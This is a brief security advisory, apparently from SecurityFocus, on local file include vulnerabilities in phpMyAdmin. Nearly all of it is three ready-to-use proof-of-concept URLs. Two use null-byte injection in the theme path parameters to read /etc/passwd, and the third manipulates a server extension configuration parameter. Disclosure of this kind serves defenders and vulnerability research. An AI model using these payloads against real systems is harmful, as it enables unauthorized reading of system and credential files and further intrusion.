PHPMyAdmin Multiple Local File Include Vulnerabilities

No exploit is required to leverage these issues. The following proof of concepts have been provided:

http://www.example.com/phpMyAdmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc/passwd%00&theme=passwd%00
http://www.example.com/phpMyAdmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc&theme=passwd%00
http://www.example.com/phpMyAdmin/libraries/database_interface.lib.php?cfg[Server][extension]=cXIb8O3


 

Privacy Statement
Copyright 2010, SecurityFocus